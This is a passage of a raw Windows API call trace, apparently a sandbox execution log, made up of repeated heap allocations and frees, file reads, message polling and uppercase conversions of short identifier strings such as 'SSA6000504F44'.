Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0267.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0267.095] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0267.095] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x116, lpOverlapped=0x0) returned 1 [0267.096] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0267.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x116) returned 0x249c7b0 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0267.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x116) returned 0x24b2e00 [0267.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x116) returned 0x249c7b0 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.099] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0267.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x116) returned 0x249c7b0 [0267.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x116) returned 0x24b2f20 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0267.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.102] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.103] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.103] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.104] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0267.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.109] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.110] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.110] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.110] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.110] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.111] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: 